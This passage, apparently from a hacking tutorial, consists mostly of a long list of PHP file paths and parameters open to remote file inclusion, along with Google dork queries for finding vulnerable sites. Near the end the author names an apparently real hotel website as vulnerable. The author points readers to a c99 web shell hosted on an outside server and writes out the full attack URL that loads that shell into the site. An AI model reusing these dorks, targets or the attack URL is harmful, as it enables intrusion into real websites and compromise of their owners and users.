/&gt;impex/ImpExData.php?systempath=&lt;br /&gt;forum/impex/ImpExData.php?systempath=&lt;br /&gt;forums/impex/ImpExData.php?systempath=&lt;br /&gt;application.php?base_path=&lt;br /&gt;index.php?theme_path=&lt;br /&gt;become_editor.php?theme_path=&lt;br /&gt;add.php?theme_path=&lt;br /&gt;bad_link.php?theme_path=&lt;br /&gt;browse.php?theme_path=&lt;br /&gt;detail.php?theme_path=&lt;br /&gt;fav.php?theme_path=&lt;br /&gt;get_rated.php?theme_path=&lt;br /&gt;login.php?theme_path=&lt;br /&gt;mailing_list.php?theme_path=&lt;br /&gt;new.php?theme_path=&lt;br /&gt;modify.php?theme_path=&lt;br /&gt;pick.php?theme_path=&lt;br /&gt;power_search.php?theme_path=&lt;br /&gt;rating.php?theme_path=&lt;br /&gt;register.php?theme_path=&lt;br /&gt;review.php?theme_path=&lt;br /&gt;rss.php?theme_path=&lt;br /&gt;search.php?theme_path=&lt;br /&gt;send_pwd.php?theme_path=&lt;br /&gt;sendmail.php?theme_path=&lt;br /&gt;tell_friend.php?theme_path=&lt;br /&gt;top_rated.php?theme_path=&lt;br /&gt;user_detail.php?theme_path=&lt;br /&gt;user_search.php?theme_path=&lt;br /&gt;invoice.php?base_path=&lt;br /&gt;cgi-bin//classes/adodbt/sql.php?classes_dir=&lt;br /&gt;cgi-bin/install/index.php?G_PATH=&lt;br /&gt;cgi-bin/include/print_category.php?dir=&lt;br /&gt;includes/class_template.php?quezza_root_path=&lt;br /&gt;bazar/classified_right.php?language_dir=&lt;br /&gt;classified_right.php?language_dir=&lt;br /&gt;phpBazar/classified_right.php?language_dir=&lt;br /&gt;chat/messagesL.php3?cmd=&lt;br /&gt;phpMyChat/chat/messagesL.php3?cmd=&lt;br /&gt;bbs/include/write.php?dir=&lt;br /&gt;visitorupload.php?cmd=&lt;br /&gt;modules/center/admin/accounts/process.php?module_path]=&lt;br /&gt;index.php?template=&lt;br /&gt;armygame.php?libpath=&lt;br /&gt;lire.php?rub=&lt;br /&gt;pathofhostadmin/?page=&lt;br /&gt;apa_phpinclude.inc.php?apa_module_basedir=&lt;br /&gt;index.php?req_path=&lt;br /&gt;research/boards/encapsbb-0.3.2_fixed/index_header.php?root=&lt;br /&gt;Farsi1/index.php?archive=&lt;br /&gt;index.php?archive=&lt;br /&gt;show_archives.php?template=&lt;br /&gt;forum/include/common.php?pun_root=&lt;br /&gt;pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=&lt;br /&gt;vuln.php?=&lt;br /&gt;cgi-bin//include/write.php?dir=&lt;br /&gt;admin/common.inc.php?basepath=&lt;br /&gt;pm/lib.inc.php?sfx=&lt;br /&gt;pm/lib.inc.php?pm_path=&lt;br /&gt;artmedic-kleinanzeigen-path/index.php?id=&lt;br /&gt;index.php?pagina=&lt;br /&gt;osticket/include/main.php?include_dir=&lt;br /&gt;include/main.php?config[search_disp]=include_dir=&lt;br /&gt;phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=&lt;br /&gt;quick_reply.php?phpbb_root_path=&lt;br /&gt;zboard/include/write.php?dir=&lt;br /&gt;PATH/admin/plog-admin-functions.php?configbasedir=&lt;br /&gt;path_to_phpgreetz/content.php?content=&lt;br /&gt;path_to_qnews/q-news.php?id=&lt;br /&gt;_conf/core/common-tpl-vars.php?confdir=&lt;br /&gt;votebox.php?VoteBoxPath=&lt;br /&gt;al_initialize.php?alpath=&lt;br /&gt;include/db.php?GLOBALS[rootdp]=&lt;br /&gt;modules/news/archivednews.php?GLOBALS[language_home]=&lt;br /&gt;protection.php?siteurl=&lt;br /&gt;modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;index2.php?includes_dir=&lt;br /&gt;classes.php?LOCAL_PATH=&lt;br /&gt;extensions/moblog/moblog_lib.php?basedir=&lt;br /&gt;modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=&lt;br /&gt;phpWebLog/include/init.inc.php?G_PATH=&lt;br /&gt;admin/objects.inc.php4?Server=&lt;br /&gt;trg_news30/trgnews/install/article.php?dir=&lt;br /&gt;block.php?Include=&lt;br /&gt;arpuivo.php?data=&lt;br /&gt;path_to_gallery/setup/index.php?GALLERY_BASEDIR=&lt;br /&gt;include/help.php?base=&lt;br /&gt;index.php?[Home]=&lt;br /&gt;path_to_script/block.php?Include=&lt;br /&gt;examples/phonebook.php?page=&lt;br /&gt;PHPNews/auth.php?path=&lt;br /&gt;include/print_category.php?dir=&lt;br /&gt;skin/zero_vote/login.php?dir=&lt;br /&gt;skin/zero_vote/setup.php?dir=&lt;br /&gt;skin/zero_vote/ask_password.php?dir=&lt;br /&gt;gui/include/sql.php?include_path=&lt;br /&gt;webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=&lt;br /&gt;email.php?login=cer_skin=&lt;br /&gt;PhotoGal/ops/gals.php?news_file=&lt;br /&gt;index.php?custom=&lt;br /&gt;loginout.php?cutepath=&lt;br /&gt;oneadmin/config.php?path[docroot]=&lt;br /&gt;xcomic/initialize.php?xcomicRootPath=&lt;br /&gt;skin/zero_vote/setup.php?dir=&lt;br /&gt;skin/zero_vote/error.php? dir=&lt;br /&gt;admin_modules/admin_module_captions.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_edit.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_delimage.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_deldir.inc.php?config[path_src_include]=&lt;br /&gt;src/index_overview.inc.php?config[path_src_include]=&lt;br /&gt;src/index_leftnavbar.inc.php?config[path_src_include]=&lt;br /&gt;src/index_image.inc.php?config[path_src_include]=&lt;br /&gt;src/image-gd.class.php?config[path_src_include]=&lt;br /&gt;src/image.class.php?config[path_src_include]=&lt;br /&gt;src/album.class.php?config[path_src_include]=&lt;br /&gt;src/show_random.inc.php?config[path_src_include]=&lt;br /&gt;src/main.inc.php?config[path_src_include]=&lt;br /&gt;src/index_passwd-admin.inc.php?config[path_admin_include]=&lt;br /&gt;yappa-ng/src/index_overview.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_captions.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_edit.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_delimage.inc.php?config[path_src_include]=&lt;br /&gt;admin_modules/admin_module_deldir.inc.php?config[path_src_include]=&lt;br /&gt;&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/themes/maze/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=&lt;br /&gt;/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_smf/smf.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_simpleboard/image_upload.php?sbp=&lt;br /&gt;/components/com_simpleboard/file_upload.php?sbp=&lt;br /&gt;/components/com_hashcash/server.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_forum/download.php?phpbb_root_path=&lt;br /&gt;/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=&lt;br /&gt;/components/minibb/index.php?absolute_path=&lt;br /&gt;/components/com_smf/smf.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_securityimages/configinsert.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_securityimages/lang.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_galleria/galleria.html.php?mosConfig_absolute_path=&lt;br /&gt;/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=&lt;br /&gt;/e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;/modules/My_eGallery/public/inc/?HCL_path=&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;/modules/My_eGallery/index.php?basepath=&lt;br /&gt;/modules/Forums/admin/index.php?phpbb_root_path=&lt;br /&gt;/modules/Forums/admin/admin_avatar.php?phpbb_root_path=&lt;br /&gt;/modules/Forums/admin/admin_styles.php?phpbb_root_path=&lt;br /&gt;/modules/Forums/admin/admin_board.php?phpEx=&lt;br /&gt;/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;/shoutbox/expanded.php?conf=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/modules/newbb_plus/class/forumpollrenderer.php?bbPath=&lt;br /&gt;/phpBB/admin/admin_styles.php?mode=&lt;br /&gt;/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/forum/auth/auth.php?phpbb_root_path=&lt;br /&gt;/forum/auth/auth_phpbb/phpbb_root_path=&lt;br /&gt;/cutenews/comments.php?cutepath=&lt;br /&gt;/library/lib.php?root=&lt;br /&gt;/impex/ImpExData.php?systempath=&lt;br /&gt;/coppermine/thumbnails.php?lang=&lt;br /&gt;/gallery/thumbnails.php?lang=&lt;br /&gt;/aWebNews/visview.php?path_to_news=&lt;br /&gt;/ashnews.php?pathtoashnews=&lt;br /&gt;/4images/index.php?template=&lt;br /&gt;/galeri/index.php?template=&lt;br /&gt;/gallery/index.php?template=&lt;br /&gt;/auth/auth.php?phpbb_root_path=&lt;br /&gt;/auth/auth_phpbb/phpbb_root_path=&lt;br /&gt;/forums/toplist.php?phpbb_root_path=&lt;br /&gt;/forum/toplist.php?phpbb_root_path=&lt;br /&gt;/admin/config_settings.tpl.php?include_path=&lt;br /&gt;/include/common.php?include_path=&lt;br /&gt;/event/index.php?page=&lt;br /&gt;/forum/index.php?includeFooter=&lt;br /&gt;/forums/index.php?includeFooter=&lt;br /&gt;/forum/bb_admin.php?includeFooter=&lt;br /&gt;/forums/bb_admin.php?includeFooter=&lt;br /&gt;/language/lang_english/lang_activity.php?phpbb_root_path=&lt;br /&gt;/forum/language/lang_english/lang_activity.php?phpbb_root_path=&lt;br /&gt;/blend_data/blend_common.php?phpbb_root_path=&lt;br /&gt;/master.php?root_path=&lt;br /&gt;/includes/kb_constants.php?module_root_path=&lt;br /&gt;/forum/includes/kb_constants.php?module_root_path=&lt;br /&gt;/forums/includes/kb_constants.php?module_root_path=&lt;br /&gt;/classes/adodbt/sql.php?classes_dir=&lt;br /&gt;/modules/mod_calendar.php?absolute_path=&lt;br /&gt;/agenda.php3?rootagenda=&lt;br /&gt;/agenda2.php3?rootagenda=&lt;br /&gt;/sources/lostpw.php?CONFIG[path]=&lt;br /&gt;/topsites/sources/lostpw.php?CONFIG[path]=&lt;br /&gt;/toplist/sources/lostpw.php?CONFIG[path]=&lt;br /&gt;/sources/join.php?CONFIG[path]=&lt;br /&gt;/topsites/sources/join.php?CONFIG[path]=&lt;br /&gt;/toplist/sources/join.php?CONFIG[path]=&lt;br /&gt;/topsite/sources/join.php?CONFIG[path]=&lt;br /&gt;/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=&lt;br /&gt;/extras/poll/poll.php?file_newsportal=&lt;br /&gt;/calogic/reconfig.php?GLOBALS[CLPath]=&lt;br /&gt;/eshow.php?Config_rootdir=&lt;br /&gt;/auction/auction_common.php?phpbb_root_path=&lt;br /&gt;/calendar/index.php?inc_dir=&lt;br /&gt;/modules/TotalCalendar/index.php?inc_dir=&lt;br /&gt;/modules/calendar/index.php?inc_dir=&lt;br /&gt;/calendar/embed/day.php?path=&lt;br /&gt;/ACalendar/embed/day.php?path=&lt;br /&gt;/calendar/add_event.php?inc_dir=&lt;br /&gt;/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=&lt;br /&gt;/claroline/auth/ldap/authldap.php?includePath=&lt;br /&gt;/docebo/modules/credits/help.php?lang=&lt;br /&gt;/modules/credits/help.php?lang=&lt;br /&gt;/includes/pafiledb_constants.php?module_root_path=&lt;br /&gt;/phpBB/includes/pafiledb_constants.php?module_root_path=&lt;br /&gt;/pafiledb/includes/pafiledb_constants.php?module_root_path=&lt;br /&gt;/auth/auth.php?phpbb_root_path=&lt;br /&gt;/auth/auth_phpbb/phpbb_root_path=&lt;br /&gt;/apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=&lt;br /&gt;/apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=&lt;br /&gt;/infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=&lt;br /&gt;/phpdig/includes/config.php?relative_script_path=&lt;br /&gt;/includes/phpdig/includes/config.php?relative_script_path=&lt;br /&gt;/includes/dbal.php?eqdkp_root_path=&lt;br /&gt;/eqdkp/includes/dbal.php?eqdkp_root_path=&lt;br /&gt;/dkp/includes/dbal.php?eqdkp_root_path=&lt;br /&gt;/path/include/SQuery/gameSpy2.php?libpath=&lt;br /&gt;/include/global.php?GLOBALS[includeBit]=&lt;br /&gt;/topsites/config.php?returnpath=&lt;br /&gt;/manager/frontinc/prepend.php?_PX_config[manager_path]=&lt;br /&gt;/ubbthreads/addpost_newpoll.php?addpoll=thispath=&lt;br /&gt;/forum/addpost_newpoll.php?thispath=&lt;br /&gt;/forums/addpost_newpoll.php?thispath=&lt;br /&gt;/ubbthreads/ubbt.inc.php?thispath=&lt;br /&gt;/forums/ubbt.inc.php?thispath=&lt;br /&gt;/forum/ubbt.inc.php?thispath=&lt;br /&gt;/forum/admin/addentry.php?phpbb_root_path=&lt;br /&gt;/admin/addentry.php?phpbb_root_path=&lt;br /&gt;/includes/orderSuccess.inc.php?glob[rootDir]=&lt;br /&gt;/stats.php?dir[func]=dir[base]=&lt;br /&gt;/ladder/stats.php?dir[base]=&lt;br /&gt;/ladders/stats.php?dir[base]=&lt;br /&gt;/sphider/admin/configset.php?settings_dir=&lt;br /&gt;/admin/configset.php?settings_dir=&lt;br /&gt;/vwar/admin/admin.php?vwar_root=&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root=&lt;br /&gt;/modules/vWar_Account/includes/get_header.php?vwar_root=&lt;br /&gt;/modules/vWar_Account/includes/functions_common.php?vwar_root2=&lt;br /&gt;/sphider/admin/configset.php?settings_dir=&lt;br /&gt;/admin/configset.php?settings_dir=&lt;br /&gt;/impex/ImpExData.php?systempath=&lt;br /&gt;/forum/impex/ImpExData.php?systempath=&lt;br /&gt;/forums/impex/ImpExData.php?systempath=&lt;br /&gt;/cgi-bin//classes/adodbt/sql.php?classes_dir=&lt;br /&gt;/cgi-bin/install/index.php?G_PATH=&lt;br /&gt;/cgi-bin/include/print_category.php?dir=&lt;br /&gt;/includes/class_template.php?quezza_root_path=&lt;br /&gt;/bazar/classified_right.php?language_dir=&lt;br /&gt;/classified_right.php?language_dir=&lt;br /&gt;/phpBazar/classified_right.php?language_dir=&lt;br /&gt;/modules/center/admin/accounts/process.php?module_path]=&lt;br /&gt;/chat/messagesL.php3?cmd=&lt;br /&gt;/phpMyChat/chat/messagesL.php3?cmd=&lt;br /&gt;/bbs/include/write.php?dir=&lt;br /&gt;/research/boards/encapsbb-0.3.2_fixed/index_header.php?root&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;&lt;br /&gt;   inurl:/include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;&lt;br /&gt;   inurl:/_functions.php?prefix=&lt;br /&gt;&lt;br /&gt;   inurl:/cpcommerce/_functions.php?prefix=&lt;br /&gt;&lt;br /&gt;   inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;&lt;br /&gt;   inurl:/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;&lt;br /&gt;   inurl:/ashnews.php?pathtoashnews=&lt;br /&gt;&lt;br /&gt;   inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=&lt;br /&gt;&lt;br /&gt;   inurl:/pm/lib.inc.php?pm_path=&lt;br /&gt;&lt;br /&gt;   inurl:/b2-tools/gm-2-b2.php?b2inc=&lt;br /&gt;&lt;br /&gt;   inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;&lt;br /&gt;   inurl:/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;&lt;br /&gt;   inurl:/includes/include_once.php?include_file=&lt;br /&gt;&lt;br /&gt;   inurl:/e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;&lt;br /&gt;   inurl:/shoutbox/expanded.php?conf=&lt;br /&gt;&lt;br /&gt;   inurl:/main.php?x=&lt;br /&gt;&lt;br /&gt;   inurl:/myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php/main.php?x=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?include=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?x=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?open=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?visualizar=&lt;br /&gt;&lt;br /&gt;   inurl:/template.php?pagina=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?pagina=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?inc=&lt;br /&gt;&lt;br /&gt;   inurl:/includes/include_onde.php?include_file=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?page=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?pg=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?show=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?cat=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?file=&lt;br /&gt;&lt;br /&gt;   inurl:/db.php?path_local=&lt;br /&gt;&lt;br /&gt;   inurl:/index.php?site=&lt;br /&gt;&lt;br /&gt;   inurl:/htmltonuke.php?filnavn=&lt;br /&gt;&lt;br /&gt;   inurl:/livehelp/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;   inurl:/hcl/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;   inurl:/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;   inurl:/support/faq/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;   inurl:/help/faq/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;   inurl:/helpcenter/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;   inurl:/live-support/inc/pipe.php?HCL_path=&lt;br /&gt;&lt;br /&gt;   inurl:/gnu3/index.php?doc=&lt;br /&gt;&lt;br /&gt;   inurl:/gnu/index.php?doc=&lt;br /&gt;&lt;br /&gt;   inurl:/phpgwapi/setup/tables_update.inc.php?appdir=&lt;br /&gt;&lt;br /&gt;   inurl:/forum/install.php?phpbb_root_dir=&lt;br /&gt;&lt;br /&gt;   inurl:/includes/calendar.php?phpc_root_path=&lt;br /&gt;&lt;br /&gt;   inurl:/includes/setup.php?phpc_root_path=&lt;br /&gt;&lt;br /&gt;   inurl:/inc/authform.inc.php?path_pre=&lt;br /&gt;&lt;br /&gt;   inurl:/include/authform.inc.php?path_pre=&lt;br /&gt;&lt;br /&gt;   inurl:index.php?nic=&lt;br /&gt;&lt;br /&gt;   inurl:index.php?sec=&lt;br /&gt;&lt;br /&gt;   inurl:index.php?content=&lt;br /&gt;&lt;br /&gt;   inurl:index.php?link=&lt;br /&gt;&lt;br /&gt;   inurl:index.php?filename=&lt;br /&gt;&lt;br /&gt;   inurl:index.php?dir=&lt;br /&gt;&lt;br /&gt;   inurl:index.php?document=&lt;br /&gt;&lt;br /&gt;   inurl:index.php?view=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?sel=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?session=&amp;content=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?locate=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?place=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?layout=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?go=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?catch=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?mode=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?name=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?loc=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?f=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?inf=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?pg=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?load=&lt;br /&gt;&lt;br /&gt;   inurl:*.php?naam=&lt;br /&gt;&lt;br /&gt;   allinurl:/index.php?page= site:*.dk&lt;br /&gt;&lt;br /&gt;   allinurl:/index.php?file= site:*.dk&lt;br /&gt;&lt;br /&gt;   INURL OR ALLINURL WITH:&lt;br /&gt;&lt;br /&gt;   /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=&lt;br /&gt;&lt;br /&gt;   /includes/header.php?systempath=&lt;br /&gt;&lt;br /&gt;   /Gallery/displayCategory.php?basepath=&lt;br /&gt;&lt;br /&gt;   /index.inc.php?PATH_Includes=&lt;br /&gt;&lt;br /&gt;   /ashnews.php?pathtoashnews=&lt;br /&gt;&lt;br /&gt;   /ashheadlines.php?pathtoashnews=&lt;br /&gt;&lt;br /&gt;   /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;&lt;br /&gt;   /demo/includes/init.php?user_inc=&lt;br /&gt;&lt;br /&gt;   /jaf/index.php?show=&lt;br /&gt;&lt;br /&gt;   /inc/shows.inc.php?cutepath=&lt;br /&gt;&lt;br /&gt;   /poll/admin/common.inc.php?base_path=&lt;br /&gt;&lt;br /&gt;   /pollvote/pollvote.php?pollname=&lt;br /&gt;&lt;br /&gt;   /sources/post.php?fil_config=&lt;br /&gt;&lt;br /&gt;   /modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;&lt;br /&gt;   /bb_lib/checkdb.inc.php?libpach=&lt;br /&gt;&lt;br /&gt;   /include/livre_include.php?no_connect=lol&amp;chem_absolu=&lt;br /&gt;&lt;br /&gt;   /index.php?from_market=Y&amp;pageurl=&lt;br /&gt;&lt;br /&gt;   /modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;&lt;br /&gt;   /pivot/modules/module_db.php?pivot_path=&lt;br /&gt;&lt;br /&gt;   /modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;&lt;br /&gt;   /derniers_commentaires.php?rep=&lt;br /&gt;&lt;br /&gt;   /modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;&lt;br /&gt;   /modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;&lt;br /&gt;   /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&lt;br /&gt;&lt;br /&gt;   /coppermine/themes/maze/theme.php?THEME_DIR=&lt;br /&gt;&lt;br /&gt;   /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;   /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;   /myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;&lt;br /&gt;   /agendax/addevent.inc.php?agendax_path=&lt;br /&gt;&lt;br /&gt;   /modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;&lt;br /&gt;   /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;&lt;br /&gt;   /main.php?page=&lt;br /&gt;&lt;br /&gt;   /default.php?page=&lt;br /&gt;&lt;br /&gt;   /index.php?action=&lt;br /&gt;&lt;br /&gt;   /index1.php?p=&lt;br /&gt;&lt;br /&gt;   /index2.php?x=&lt;br /&gt;&lt;br /&gt;   /index2.php?content=&lt;br /&gt;&lt;br /&gt;   /index.php?conteudo=&lt;br /&gt;&lt;br /&gt;   /index.php?cat=&lt;br /&gt;&lt;br /&gt;   /include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;&lt;br /&gt;   /modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;&lt;br /&gt;   /shoutbox/expanded.php?conf=&lt;br /&gt;&lt;br /&gt;   /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;&lt;br /&gt;   /pivot/modules/module_db.php?pivot_path=&lt;br /&gt;&lt;br /&gt;   /library/editor/editor.php?root=&lt;br /&gt;&lt;br /&gt;   /library/lib.php?root=&lt;br /&gt;&lt;br /&gt;   /e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;&lt;br /&gt;   /zentrack/index.php?configFile=&lt;br /&gt;&lt;br /&gt;   /main.php?x=&lt;br /&gt;&lt;br /&gt;   /becommunity/community/index.php?pageurl=&lt;br /&gt;&lt;br /&gt;   /Grademap/index.php?page=&lt;br /&gt;&lt;br /&gt;   /index4.php?body=&lt;br /&gt;&lt;br /&gt;   /side/index.php?side=&lt;br /&gt;&lt;br /&gt;   /main.php?page=&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;after this above gooling dorks i got a website which is vulner&lt;br /&gt;to RFi &lt;br /&gt;&lt;br /&gt;i found one &lt;br /&gt;&lt;br /&gt;http://www.hotellesmouettes.fr/print.php?loc=&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;now go to google.com and fing c99 or c100 shell&lt;br /&gt;&lt;br /&gt;i got &lt;br /&gt;&lt;br /&gt;http://saldiri.org/c99.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if u dont know how to use make a home server in apache upload as .php coz it ur server&lt;br /&gt;and open u will clear understand it &lt;br /&gt;&lt;br /&gt;but for RFI use .txt only coz server know wht is this .txt will do !&lt;br /&gt;&lt;br /&gt;lets attack !!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.hotellesmouettes.fr/print.php?loc=  here should bt ur shell &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.hotellesmouettes.fr/print.php?loc=http://saldiri.org/c99.txt?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;كود:&lt;br /&gt;/surveys/survey.inc.php?path=&lt;br /&gt;index.php?body=&lt;br /&gt;/classes/adodbt/sql.php?classes_dir=&lt;br /&gt;enc/content.php?Home_Path=&lt;br /&gt;/classified_right.php?language_dir=&lt;br /&gt;/sources/functions.php?CONFIG[main_path]=&lt;br /&gt;/sources/template.php?CONFIG[main_path]=&lt;br /&gt;/embed/day.php?path=&lt;br /&gt;/includes/dbal.php?eqdkp_root_path=&lt;br /&gt;/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]=&lt;br /&gt;/includes/kb_constants.php?module_root_path=&lt;br /&gt;/mcf.php?content=&lt;br /&gt;/components/com_facileforms/facileforms.frame.php?ff_compath=&lt;br /&gt;skins/advanced/advanced1.php?pluginpath[0]=&lt;br /&gt;/zipndownload.php?PP_PATH=&lt;br /&gt;/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_zoom/includes/database.php?mosConfig_absolute_path=&lt;br /&gt;/main.php?sayfa=&lt;br /&gt;/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=&lt;br /&gt;/addpost_newpoll.php?addpoll=preview&amp;thispath=&lt;br /&gt;/header.php?abspath=&lt;br /&gt;components/com_performs/performs.php?mosConfig_absolute_path=&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=&lt;br /&gt;impex/ImpExData.php?systempath=&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root=&lt;br /&gt;/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=&lt;br /&gt;/tools/send_reminders.php?includedir= allinurl:day.php?date=&lt;br /&gt;/skin/zero_vote/error.php?dir=&lt;br /&gt;/modules/TotalCalendar/about.php?inc_dir=&lt;br /&gt;/login.php?dir=&lt;br /&gt;/tags.php?BBCodeFile=&lt;br /&gt;index.php?pageurl=&lt;br 